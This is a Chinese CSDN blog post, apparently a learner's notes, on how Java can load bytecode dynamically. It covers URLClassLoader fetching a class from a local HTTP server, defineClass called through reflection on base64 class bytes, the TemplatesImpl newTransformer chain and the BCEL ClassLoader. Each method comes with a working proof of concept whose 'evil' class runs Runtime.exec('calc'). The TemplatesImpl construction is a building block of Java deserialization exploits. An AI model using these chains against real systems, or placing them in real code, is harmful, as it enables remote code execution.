[Java安全]—动态加载字节码文件

已于 2022-09-14 14:20:02 修改
阅读量1.7k 收藏
点赞数 3
分类专栏: Java 文章标签: java 安全 开发语言
于 2022-05-30 13:30:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/125036280
版权

ClassLoader加载远程字节码

POC

import java.io.IOException;
import java.net.URL;
import java.net.URLClassLoader;

public class Classloader {
    public static void main(String[] args) throws IOException, ClassNotFoundException, InstantiationException, IllegalAccessException {
        URL[] urls = {new URL("http://127.0.0.1:8000/")};
        URLClassLoader classLoader = URLClassLoader.newInstance(urls);
        Class<?> c = classLoader.loadClass("Exec");
        c.newInstance();
    }
}

构造一个恶意的类

import java.io.IOException;

public class Exec {
    public Exec() throws IOException {
        Runtime.getRuntime().exec("calc");
    }
}

在当前目录生成Exec.class字节码文件,并开启远程服务

在这里插入图片描述

此时运行Classloader.java便会弹出计算器,成功远程代码执行

在这里插入图片描述

defineClass直接加载字节码

不管是加 载远程class文件,还是本地的class或jar文件,Java都经历的是下面这三个方法调用:

ClassLoader#loadClass
	ClassLoader#findClass
		#ClassLoader#defineClass

在前篇classloader,自定义类的加载器时也有说过这三个方法

两种方式读取

第一种就是通过IO进行文件读取,这里的defineClass是protect类型的,所以需要通过反射来获取,而getSystemClassLoader是因为ClassLoader是一个抽象类,无法实例话而调用的一个静态方法,前篇提到过。

import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class DefineClassTest {
    public static void main(String[] args) throws IOException, ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException, InvocationTargetException, InvocationTargetException {
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);
        defineClass.setAccessible(true);
        byte[] code= Files.readAllBytes(Paths.get("C:\\Users\\del'l'\\Desktop\\Exec.class"));
        Class Exec = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(),"Exec",code,0,code.length);
        Exec.newInstance();
    }
}

另一种就是将字节码文件设置为Exec.class的base64编码,(因为Exec.class存在不可见字符)

在这里插入图片描述

import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.net.MalformedURLException;
import java.util.Base64;

public class DefineClassTest {
    public static void main(String[] args) throws MalformedURLException, ClassNotFoundException, IllegalAccessException, InstantiationException, NoSuchMethodException, InvocationTargetException, InvocationTargetException {
        Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);
        defineClass.setAccessible(true);
        byte[] code = Base64.getDecoder().decode("yv66vgAAADQAHAoABgAPCgAQABEIABIKABAAEwcAFAcAFQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAWAQAKU291cmNlRmlsZQEACUV4ZWMuamF2YQwABwAIBwAXDAAYABkBAARjYWxjDAAaABsBAARFeGVjAQAQamF2YS9sYW5nL09iamVjdAEAE2phdmEvaW8vSU9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAABAAEABwAIAAIACQAAAC4AAgABAAAADiq3AAG4AAISA7YABFexAAAAAQAKAAAADgADAAAABAAEAAUADQAGAAsAAAAEAAEADAABAA0AAAACAA4=");
        Class Exec = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(),"Exec",code,0,code.length);
        Exec.newInstance();
    }
}

这种方式会有一个初始化的问题,前篇提到过ClassLoader.loadClass这种方式,不会进行初始化,所以即使是static{}的内容也不会执行。在实际场景中,因为defineClass方法作用域是不开放的,所以攻击者很少能直接利用到它,但它却是我 们常用的一个攻击链 TemplatesImpl 的基石。

TemplatesImpl加载字节码

TemplatesImpl相当于defineClass的一个延伸吧,defineClass在TemplatesImplTransletClassLoader被重载

跟进com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl的TransletClassLoader类

static final class TransletClassLoader extends ClassLoader {
    private final Map<String,Class> _loadedExternalExtensionFunctions;

     TransletClassLoader(ClassLoader parent) {
         super(parent);
        _loadedExternalExtensionFunctions = null;
    }

    TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {
        super(parent);
        _loadedExternalExtensionFunctions = mapEF;
    }

    public Class<?> loadClass(String name) throws ClassNotFoundException {
        Class<?> ret = null;
        // The _loadedExternalExtensionFunctions will be empty when the
        // SecurityManager is not set and the FSP is turned off
        if (_loadedExternalExtensionFunctions != null) {
            ret = _loadedExternalExtensionFunctions.get(name);
        }
        if (ret == null) {
            ret = super.loadClass(name);
        }
        return ret;
     }

    /**
     * Access to final protected superclass member from outer class.
     */
    Class defineClass(final byte[] b) {
        return defineClass(null, b, 0, b.length);
    }
}

在最后重写了defineClass方法,并且没注明类型,所以默认为default只能为内部调用。

所以要看本类中谁调用了defineClass,在defineTransletClasses()发现

在这里插入图片描述

再看谁调用了defineTransletClasses,发现getTransletInstance()

在这里插入图片描述

接着看调用getTransletInstance(),发现newTransformer(),而这个方法是public的可以直接进行外部调用,所以到这结束了

在这里插入图片描述

TemplatesImpl#newTransformer() ->
TemplatesImpl#getTransletInstance() -> 
TemplatesImpl#defineTransletClasses()-> 
TransletClassLoader#defineClass()

链子捋完了剩下的就是一些细节的部分

继续跟进到newTransformer#getTransletInstance(),要满足两个条件 _name不为null,且_class为null才能进入defineTransletClasses(),而默认情况下它俩都为null,所以就需要修改_name的值

private Translet getTransletInstance()
    throws TransformerConfigurationException {
    try {
        if (_name == null) return null;

        if (_class == null) defineTransletClasses();

而这些都是私有属性所以,需要通过反射来修改他的值,此时在TemplatesImpl.java中发现构造器

public TemplatesImpl() { }

那就可以通过这个构造器来修改我们的属性值了,由于修改部分用的较多这里直接写成了setFieldValue()方法

public class TemplatesImplTest {
    public static void main(String[] args) throws Exception {
        Templates templates = new TemplatesImpl();
        setFieldValue(templates,"_name","Sentiment");

    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
}

继续跟进defineTransletClasses(),这里判断_bytecodes不能为null

    if (_bytecodes == null) {
        ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);
        throw new TransformerConfigurationException(err.toString());
    }

在往下看这里会调用loader.defineClass(_bytecodes[i]);

final int classCount = _bytecodes.length;
_class = new Class[classCount];

for (int i = 0; i < classCount; i++) {
	_class[i] = loader.defineClass(_bytecodes[i]);

所以_bytecodes[0]就该是我们要加载的类的字节数组:

setFieldValue(templates,"_bytecodes",new byte[][]{bytes});

这里构造完后再看中间还有个run()方法

TransletClassLoader loader = (TransletClassLoader)
    AccessController.doPrivileged(new PrivilegedAction() {
        public Object run() {
            return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());
        }
    });

其中调用了_tfactory.getExternalExtensionsMap(),跟进后,发现getExternalExtensionsMap()是TransformerFactoryImpl类的所以这里直接构造

setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

构造好后还有一个点:

根据p神的描述:TemplatesImpl 中对加载的字节码是有一定要求的:这个字节码对应的类必须是 com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet 的子类。
分析下具体原因:

private int _transletIndex = -1;
..............................

if (superClass.getName().equals(ABSTRACT_TRANSLET)) {
    _transletIndex = i;
}
 else {
    _auxClasses.put(_class[i].getName(), _class[i]);
    }     
}

if (_transletIndex < 0) {
   ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);
   throw new TransformerConfigurationException(err.toString());
            }

defineTransletClasses()中,else中的_auxClasses默认值为null,所以调用put方法后就会报错,而且_transletIndex 默认值为-1,即使给_auxClasses赋值也会在下边的if处抛出异常从而报错,所以这里就需要进入if语句,而if中会判断父类名是否跟ABSTRACT_TRANSLET相同,跟进看下

private static String ABSTRACT_TRANSLET
= "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

所以在构造时就需要继承于AbstractTranslet,而AbstractTranslet是个抽象类就需要实现它未实现的接口,可以看到第一个的transform()
在这里插入图片描述
AbstractTranslet还继承了TransletTranslet也有一个transform()没有实现,所以在这里就需要同时实现两个类的transform(),即:

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class EvilTest extends AbstractTranslet{

    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    public EvilTest() throws Exception{
        Runtime.getRuntime().exec("calc");
    }
}

生成class文件

javac EvilTest.java

POC

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import javax.xml.transform.Templates;
import java.lang.reflect.Field;
import java.util.Base64;

public class TemplatesImplTest {
    public static void main(String[] args) throws Exception {
        Templates templates = new TemplatesImpl();
        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEACEV2aWxUZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAMAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAASAAQAEwANABQACwAAAAQAAQAQAAEAEQAAAAIAEg==");
        setFieldValue(templates,"_name","Sentiment");
        setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        templates.newTransformer();
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
}

看师傅文章写到这里并没有进行newInstance(),为什么会弹出计算器?跟进看一下

在new后,先进入getTransletInstance()->defineTransletClasses()

在这里插入图片描述

由于我们只传入了一个字节数组,所以_bytecode的长度默认为1,赋值给了classCount,之后第一轮循环i=0,将_bytecode的值赋给_class[0],最后经过if判断,将_transletIndex赋值为0

在这里插入图片描述

之后回到getTransletInstance(),调用_class[0]的newInstance();弹出计算器

在这里插入图片描述

BCEL ClassLoader加载字节码

详细可看p神文章BCEL ClassLoader去哪了 | 离别歌 (leavesongs.com)

我们可以通过BCEL提供的两个类 Repository 和 Utility 来利用: Repository 用于将一个Java Class 先转换成原生字节码,当然这里也可以直接使用javac命令来编译java文件生成字节码; Utility 用于将 原生的字节码转换成BCEL格式的字节码

这里的class文件就直接用前边的Exec.class

POC

import com.sun.org.apache.bcel.internal.Repository;
import com.sun.org.apache.bcel.internal.classfile.JavaClass;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import com.sun.org.apache.bcel.internal.util.ClassLoader;	//8u_251后移除,注意版本


public class BCELTest {
    public static void main(String[] args) throws Exception {
        JavaClass javaClass = Repository.lookupClass(Exec.class);
        String code = Utility.encode(javaClass.getBytes(),true);
        new ClassLoader().loadClass("$$BCEL$$"+code).newInstance();
    }
}

要加上$$BCEL$$是因为:

BCEL这个包中有个有趣的类com.sun.org.apache.bcel.internal.util.ClassLoader,他是一个ClassLoader,但是他重写了Java内置的ClassLoader#loadClass()方法。

在ClassLoader#loadClass()中,其会判断类名是否是$BCEL$开头,如果是的话,将会对这个字符串进行decode。

总结

这块感觉东西很杂学的很乱,等后续学fastjson时再补吧。。。。。

《Java安全漫谈 - 13.Java中动态加载字节码的那些方法》

Java安全动态加载字节码学习笔记_bfengj的博客-CSDN博客

(1条消息) 加载字节码的几种方式_@Demo的博客-CSDN博客_字节码加载

S1nJa
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
java 动态加载class文件路径_Java动态加载jar及class文件
weixin_39612653的博客
02-13 1204
经常碰到需要动态加载jar及class文件的场景。Java由于需要加载和编译字节码动态加载class文件较为麻烦,但JDK仍提供了一整套方法来动态加载jar文件和class文件。一、动态加载jar// 系统库路径File libPath = new File(jar文件所在路径);// 获取所有的.jar和.zip文件File[] jarFiles = libPath.listFiles(n...
Java 将字符串动态生成字节码的实现方法
09-04
Java编程语言中,动态生成字节码是一项高级技术,它允许程序在运行时创建新的或修改已有的。这种技术通常用于元编程、AOP(面向切面编程)和性能优化等领域。本文将详细讲解如何使用Java将字符串转换为可执行...
java字节码以及ClassLoader加载机制
Thunderclap的博客
02-09 606
上面提到ClassLoader 能够加载字节码的关键就在于loadClass findClass defineClass 这三个方法因为 loadClass 实现了双亲委派机制, Java 官方不推荐直接重写该方法 (除去一些特殊情况, 比如 tomcat 和 jdbc 就破坏了这种机制)而defineClass 是一个 native 方法, 底层由 C++ 实现所以我们的重点就是重写 findClass 方法, 并最终在里面调用 defineClass。
Java安全-动态加载字节码
qq_52988816的博客
08-17 641
首先我们来看看什么是JAVA字节码Java字节码Java虚拟机执行的一种虚拟指令格式。换一种说法就是编译后得到的class文件内容,本质上就是JVM执行使用的一指令。可以说是**所有能够恢复成一个并在JVM虚拟机里加载的字节序列。个人理解就是利用一些方法去执行class文件内容。**接下来给大家带来几种加载字节码的方法。...
Spring Boot 动态加载jar包,动态配置太强了!
最新发布
Wewe的博客
04-20 586
同时定义了加载器的卸载方法,卸载方法中,将已加载的集合中移除该。目前数据治理服务中有众多治理任务,当其中任一治理任务有改动需要升级或新增一个治理任务时,都需要将数据治理服务重启,会影响其他治理任务的正常运行。自定义加载器中,为了方便的卸载,定义一个map保存已加载信息。为了支持业务代码尽量的解耦,把部分业务功能通过动态加载的方式加载到主程序中,以满足可插拔式的加载、组合式的部署。使用动态加载时,为了避免服务重新启动后丢失已加载的任务包,使用动态配置的方式,加载动态更新初始化加载配置。
java——Class、动态加载
dengyunhui1210的博客
01-01 102
Class和Object混淆了?   Object: 任何都是Object的子   Class: 任何都是Class的实例对象   Class可以说是一种特殊的,它表示的是型,Object仍然是Class的父,而Object也会有它自己的型:java.lang.Object。 import X_X.model.user.User; public c...
Java】简单优雅的加载外部 jar 中的 Class|插件化
黑白法师的博客
04-14 3091
在鸽了那么亿段时间之后,我又回来了 那么今天主要就是来聊聊如何动态加载一个jar中的 想直接看 Wiki 的同学可以点这里 需求 先来说说为什么会有这个需求 我之前做物联网相关业务平台时,要求这个平台能够接入各种设备 但是不同型不同厂家不同协议的设备的接入方式完全不一样,字段也不一样 比如会有灯,摄像头,屏,广播等等各种各样的设备 灯会有开关等功能,摄像头会有预览回放等功能,屏会有播放视频等功能,广播会有播放音频调节音量等功能 有些设备通过TCP或是MQTT直连,有些设备通过HTTP或是SDK和厂家平台
java注解_反射_字节码_加载机制.zip
05-13
Java注解、反射、字节码加载机制是Java编程中的核心概念,它们在实际开发中扮演着重要角色。让我们深入探讨这些知识点。 **Java注解(Annotation)**: Java注解是一种元数据,它提供了在编译时或运行时处理代码的...
java 中如何获取字节码文件的相关内容
08-30
Java编程中,反射机制是Java提供的一种强大的工具,它允许程序在运行时动态地获取的信息并调用其方法。...通过理解如何获取字节码文件的内容,开发者可以更好地利用Java反射机制进行各种动态编程任务。
Java语言-动态编译代码并热加载
06-08
Java源代码(.java文件)需要通过Java编译器(javac)转化为字节码(.class文件)才能被JVM执行。然而,在某些情况下,我们可能希望在运行时动态地生成或修改源代码并立即编译为可执行的字节码。这可以通过Java的`...
java实现dex文件方法字节码隐藏
05-01
Java中的Dex文件是Dalvik虚拟机执行的字节码格式,主要用于Android应用程序。当我们谈论“java实现dex文件方法字节码隐藏”时,我们实际上是在讨论如何在Android应用的编译或打包过程中,对特定的方法进行混淆或者...
Java动态加载(一)——java文件动态编译为class文件
04-04
NULL 博文链接:https://zheng12tian.iteye.com/blog/1488813
Java 动态加载jar和class文件实例解析
08-28
主要介绍了Java 动态加载jar和class文件实例解析,分享了相关代码示例,小编觉得还是挺不错的,具有一定借鉴价值,需要的朋友可以参考下
Java 动态加载jar和class文件
司马懿的西山居
10-10 2925
JAVA文件加载动态的。也就是说当我们用到的时候才会去加载,如果不用的话,就不会去加载我们的JAVA为我们提供了两种动态机制。第一种是隐式机制。第二种是显示机制。如下: 两种方法: 隐式机制 :new一个对象 + 调用的静态方法 显式机制 : 由 java.lang.Class的forName()方法加载java.lang.ClassLoader的loadClass()方法加载
java(Class 常用方法 获取Class对象六种方式 动态和静态加载 加载流程)
m0_62434717的博客
03-10 3224
java学习笔记
URLClassLoader 加载同名
weixin_38526093的博客
02-11 1317
URLClassLoader作为最常用、使用最广泛的加载器,在java世界中扮演着举足轻重的角色。问题还是出在加载器身上,由于双亲委托机制的存在,对于包含相同名的jar包,class实例只会选择优先被加载的jar包,后者则会被无视。一般的,系统加载器是AppClassLoader,当然也可以通过jvm选项Djava.system.class.loader。一般通过在URLClassLoader构造器中指定URL数组来初始化路径的加载,当然也可以使用反射的方式来动态加载路径。
java安全——加载和UnsafeClassLoaderURLClassLoader
网络安全
09-13 1536
当要执行某一个时,java程序在运行前会将java文件编译成class字节码文件,然后调用ClassLoader加载加载字节码,通过JVM的native方法来创建的class对象。 使用javap命令反编译HelloTest.class文件查看其内容 用工具以十六进制打开.class文件的二进制内容,jvm执行HelloTest会解析class文件中的字节码内容(ByteCode) ClassLoader加载ClassLoader加载器主要是用于加载jav..
Java原理系列】JavaClassLoader原理用法示例中文源码分析
热门推荐
wang2leee的博客
10-15 4万+
**加载器是负责加载的对象**。ClassLoader是一个**抽象**。 给定的二进制名称,加载器应该尝试定位或生成构成该定义的数据。典型的策略是将名称转换为文件名,然后从文件系统中读取该名称的“文件”。
URLClassLoader动态加载
ainie4139的博客
09-16 228
说明: Java利用ClassLoader载入内存,并且在同一应用中,可以有很多个ClassLoader,通过委派机制,把装载的任务传递给上级的装载器的,依次推,直到启动装载器(没有上级装载器)。如果启动装载器能够装载这个,那么它会首先装载。如果不能,则往下传递。当父为null时,JVM内置的(称为:bootstrap class loader)就会充当父。想想眼下...
java虚拟机读取字节码文件
08-23
2. 验证:在加载字节码文件后,Java虚拟机会对字节码文件进行验证,确保其符合Java语言规范和虚拟机规范。验证过程包括对字节码文件的结构、语义和安全性进行检查。 3. 准备:在验证通过后,Java虚拟机会为变量...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值